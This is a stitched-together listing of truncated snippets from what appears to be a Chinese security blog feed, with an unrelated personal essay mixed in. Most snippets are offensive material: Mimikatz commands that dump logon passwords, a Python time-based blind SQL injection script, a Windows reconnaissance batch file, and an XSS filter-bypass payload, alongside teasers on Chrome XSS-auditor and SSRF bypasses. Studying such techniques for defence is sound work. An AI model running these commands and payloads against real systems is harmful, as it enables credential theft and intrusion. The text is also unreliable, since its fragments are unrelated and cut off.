一个基于报错的盲注场景

一个基于报错的盲注场景 MayIKissYou | 2015-11-06 16:17 1:背景 近日某壮汉给了我个链接 说有注入 但是过滤了一些关键字 导致数据有些出不来 让我帮忙看看 于是 我看他造爷 就研究了

Mimikatz 使用 Tips

Mimikatz 使用Tips Evi1cg (感觉自己萌萌哒) | 2015-09-17 16:42 1.记录 Mimikatz输出: C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir 2.将输出导入到本地文件: C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt 3.将输出传输

一个获取windows系统信息的批处理脚本

@echo off echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo System Information >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt systeminfo | findstr /B /C:"OS" > System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo Hostname >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt hostname >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo Users>> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt net users >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo Route table >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt route print >> System_Details.txt echo

放弃那些无用的社交

那年我一个人来到北京,带上父亲跟我说的一句话:多交朋友。 于是,上大学时,我酷爱社交,参加了三个社团,只要有活动,都会去打个酱油。我乐意留别人

python延迟注入

#!/usr/bin/env python # -*- coding: utf-8 -*- # 延迟注入工具 import urllib2 import time import socket import threading import requests class my_threading(threading.Thread): def __init__(self, str,x): threading.Thread.__init__(self) self.str = str self.x = x def run(self): global res x=self.x j = self.str url = "http://localhost/demo/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23" html = request(url) verify = 'timeout' if verify not in html: res[str(j)] = 0 #print 1

Bypassing Chrome’s Anti-XSS Filter,绕过谷歌浏览器 XSS 过滤器

Hi! Just wanted to share my finding. I’ve found a way to bypass Chrome’s anti-xss filter. This bypass is universal, and it defeats Chrome’s XSSAuditor in all cases! Description XSS attacks occur when one website injects JavaScript code into otherwise legitimate requests to another website. The injected script generally attempts to access privileged

浅谈代码中的重定向

浅谈代码中的重定向 he1renyagao (github.com/NaihTool) | 2015-06-21 16:40 今天,回顾下以前挖洞的思路,看到SSRF 这个问题,突然觉得利用302跳转来绕过这个点有点想法,于是自己测试了下。

New IE mutation vector

I was messing around with a filter that didn’t correctly filter attribute names and allowed a blank one which enabled me to bypass it. I thought maybe IE had similar issues when rewriting innerHTML. Yes it does of course The filter bypass worked like this: <img ="><script>alert(1)</script>"> The filter incorrectly assumed it was still inside an attribute and therefore allowed raw html to be injected and the various browsers treat it as an invalid attribute and execute the script.